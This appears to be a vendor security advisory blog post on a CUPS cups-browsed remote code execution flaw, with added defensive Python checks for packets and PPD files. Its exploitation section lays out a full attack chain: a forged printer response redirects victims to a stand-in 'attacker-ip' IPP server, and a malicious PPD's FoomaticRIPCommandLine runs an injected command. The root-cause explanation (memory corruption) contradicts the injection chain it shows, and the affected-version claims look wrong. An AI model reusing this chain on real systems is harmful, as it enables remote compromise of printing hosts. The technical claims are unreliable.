Remote Code Execution (RCE) in CUPS via ‘cups-browsed’

CUPS (Common Unix Printing System) is a popular printing system for Unix-like systems, with cups-browsed responsible for printer discovery and network browsing. A recent vulnerability in cups-browsed allows Remote Code Execution (RCE) through manipulated printer discovery responses. This vulnerability is caused by insufficient input validation on UDP port 631, which is used for printer discovery.

CUPS Vulnerability Details

In its default configuration, cups-browsed listens on all interfaces (0.0.0.0:631), allowing both LAN and WAN-based attackers to send malicious UDP packets. These packets trigger the processing of printer discovery data in an unsafe manner. The flaw is in the handling of these discovery packets, where improper parsing leads to memory corruption, potentially allowing attackers to execute arbitrary code.

The vulnerability arises when cups-browsed processes a specially crafted packet in the following format:

HEX_NUMBER HEX_NUMBER TEXT_DATA

Insufficient checks allow attackers to exploit this behavior, which could result in arbitrary code execution. The vulnerable function, process_browse_data, fails to validate input adequately, leading to a possible race condition or memory corruption.
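
As an added example (not code from the article or from CUPS itself), the following Python classifier parses a packet in the HEX_NUMBER HEX_NUMBER TEXT_DATA layout described above and rejects anything that should not be allowed to create a printer: oversized or non-ASCII payloads, non-hex type/state fields, non-IPP URIs, and URIs whose host is not on an allowlist. The sample packets, the allowlist hostnames and the MAX_PACKET size cap are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed packets in the layout the text describes (HEX HEX TEXT):
# two hex fields, then a printer URI and optional quoted strings. Not a
# real capture; hostnames are placeholders.
SAMPLE_PACKETS = [
    b'6 3 ipp://print01.corp.example:631/printers/lab "Floor 2" "HP LaserJet"',
    b'6 3 ipp://attacker-ip:631/EVIL_PRINTER "Office" "Generic"',
    b'zz 3 ipp://print01.corp.example:631/printers/lab',
    b'6 3 http://print01.corp.example/not-a-printer',
    b'6 3 ' + b'A' * 4096,
]

HEX_FIELD = re.compile(r'^[0-9A-Fa-f]{1,8}$')
MAX_PACKET = 1024  # assumed size cap; tune to your environment

def check_browse_packet(raw: bytes, allowed_hosts):
    """Classify one UDP/631 browse packet before anything acts on it.
    Returns ('ok', uri) or ('reject', reason); every reject is a
    candidate log/alert event for a defender."""
    if len(raw) > MAX_PACKET:
        return ('reject', 'oversized packet')
    try:
        text = raw.decode('ascii')
    except UnicodeDecodeError:
        return ('reject', 'non-ascii bytes')
    fields = text.split(' ', 2)          # type, state, everything else
    if len(fields) < 3:
        return ('reject', 'too few fields')
    ptype, state, rest = fields
    if not (HEX_FIELD.match(ptype) and HEX_FIELD.match(state)):
        return ('reject', 'type/state not hex')
    uri = rest.split(' ', 1)[0]
    parsed = urlparse(uri)
    if parsed.scheme not in ('ipp', 'ipps') or not parsed.hostname:
        return ('reject', 'uri is not an ipp/ipps printer: ' + uri)
    if parsed.hostname not in allowed_hosts:
        return ('reject', 'unlisted printer host: ' + parsed.hostname)
    return ('ok', uri)

def suspicious_packets(packets, allowed_hosts):
    """Return (packet, reason) for every packet that should not create a printer."""
    out = []
    for pkt in packets:
        verdict, detail = check_browse_packet(pkt, allowed_hosts)
        if verdict == 'reject':
            out.append((pkt, detail))
    return out
```

Fed from a packet capture on UDP 631, the reject reasons give a defender a concrete list of hosts advertising printers that the environment never approved.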

Affected CUPS Versions

  • CUPS versions prior to 2.3.3: These versions are vulnerable to the RCE issue due to the lack of input validation and unsafe memory handling in cups-browsed.
  • Versions 2.3.3 and later: A patch was introduced to improve input validation and memory handling, reducing the risk of arbitrary code execution.

Exploitation Scenarios

1. Discovery of IPP Server:

The attacker initiates the attack by scanning the network for devices running the Common Unix Printing System (CUPS) that support IPP (Internet Printing Protocol). They send multicast or broadcast packets to discover active printers, often using tools like Nmap or ippfind.

Example of a discovery packet (typically sent over UDP):

IPP/1.1 Get-Printer-Attributes
Request-ID: 1

2. Crafting Malicious Response:

Once a potential target is identified, the attacker crafts a malicious response packet designed to hijack the print discovery process. This response mimics a legitimate printer response but contains a redirect to the attacker’s IPP server.

The attacker sets the printer-uri to point to their malicious IPP server:

IPP/1.1 200 OK
Request-ID: 1
printer-uri: ipp://attacker-ip:631/EVIL_PRINTER

3. Connection to Malicious IPP Server:

The victim’s system, upon receiving the malicious response, attempts to connect to the attacker’s IPP server. It sends a request to fetch printer attributes or capabilities:

IPP/1.1 Get-Printer-Attributes
Request-ID: 2
printer-uri: ipp://attacker-ip:631/EVIL_PRINTER

4. Delivering Malicious PPD File:

The attacker’s IPP server responds with a crafted PPD file containing malicious commands:

IPP/1.1 200 OK
Request-ID: 2
attributes-charset: utf-8
attributes-natural-language: en
printer-commands: Print
printer-name: EVIL_PRINTER
printer-uri: ipp://attacker-ip:631/EVIL_PRINTER
*FoomaticRIPCommandLine: "echo 1 > /tmp/PWNED"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"

5. Execution of Malicious Commands:

When a print job is initiated on the compromised printer, the CUPS system processes the job using the foomatic-rip filter. This filter executes the command specified in the FoomaticRIPCommandLine, resulting in the execution of arbitrary code:

echo 1 > /tmp/PWNED
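
The chain above ends with a PPD whose *FoomaticRIPCommandLine is handed to foomatic-rip. As an added example (not from the article), this Python audit reads PPD text of the kind found under /etc/cups/ppd, reports every file that carries such a command line, and marks as high severity any command containing shell redirection, chaining or substitution. The sample PPD fragments and the severity heuristic are constructed assumptions; legitimate Foomatic drivers do use this attribute, so 'review' findings need a human look rather than automatic removal.

```python
import re

# Constructed PPD fragments standing in for files under /etc/cups/ppd.
# The first mirrors the attribute the text describes; the second is a
# benign Foomatic-style driver line; the third has no command line at all.
SAMPLE_PPDS = {
    "EVIL_PRINTER.ppd": (
        '*PPD-Adobe: "4.3"\n'
        '*FoomaticRIPCommandLine: "echo 1 > /tmp/PWNED"\n'
        '*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"\n'
    ),
    "office.ppd": (
        '*PPD-Adobe: "4.3"\n'
        '*FoomaticRIPCommandLine: "gs -q -dBATCH -sDEVICE=ljet4 -sOutputFile=- -"\n'
        '*cupsFilter2: "application/vnd.cups-pdf application/vnd.cups-postscript 0 foomatic-rip"\n'
    ),
    "plain.ppd": '*PPD-Adobe: "4.3"\n*cupsFilter: "application/vnd.cups-raster 0 rastertohp"\n',
}

CMDLINE = re.compile(r'^\*FoomaticRIPCommandLine:\s*"(.*)"\s*$', re.M)
# Assumed heuristic: redirection, command chaining or substitution inside
# the command line is unusual in vendor PPDs and deserves a manual check.
SHELL_META = re.compile(r'(>|<|;|&&|\|\||`|\$\()')

def audit_ppd(name: str, text: str):
    """Return a finding for one PPD, or None when it does not hand a
    command line to foomatic-rip."""
    m = CMDLINE.search(text)
    if not m:
        return None
    cmd = m.group(1)
    return {
        'ppd': name,
        'command': cmd,
        'foomatic_filter': 'foomatic-rip' in text,   # filter line present?
        'severity': 'high' if SHELL_META.search(cmd) else 'review',
    }

def audit_all(ppds):
    """Findings for every PPD in a {name: text} mapping, in input order."""
    return [f for f in (audit_ppd(n, t) for n, t in ppds.items()) if f]

if __name__ == '__main__':
    for finding in audit_all(SAMPLE_PPDS):
        print(finding)
```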

Mitigation and Patches

Upwind’s research team compiled detailed mitigation steps, which can be viewed in this article.

How Upwind Protects You from CUPS RCE Vulnerability

Upwind Cloud Security Platform provides comprehensive protection and vulnerability management, offering tools to identify and mitigate risks from this vulnerability:

  • SBOM Explorer: Use Upwind’s SBOM Explorer to locate all instances of CUPS and cups-browsed in your environment and check which versions are affected by this vulnerability.
  • Vulnerable Resource Detection: Identify all resources in your environment running vulnerable versions of CUPS, and assess which clusters, VMs, and resources are exposed to this vulnerability.
  • Risk Context: Understand the potential impact of this vulnerability on your system, particularly in environments with sensitive data, internet exposure, or communication with critical services.
  • Prioritize Fixes: Upwind helps you prioritize patching or updating vulnerable resources, streamlining the process to secure your environment against this RCE vulnerability.
  • Interactive Map and Connections: Upwind provides an interactive map to visualize all network connections. You can easily locate and monitor connections on UDP ports 631 and 5353, helping you identify potential vulnerabilities and secure your environment effectively.

Get Further Assistance with Upwind MDR

For real-time support, Upwind’s Managed Detection and Response (MDR) team is available 24/7 to assist with critical vulnerabilities like the CUPS RCE. Contact the MDR team at [email protected] for help with patching or mitigating this vulnerability in your environment.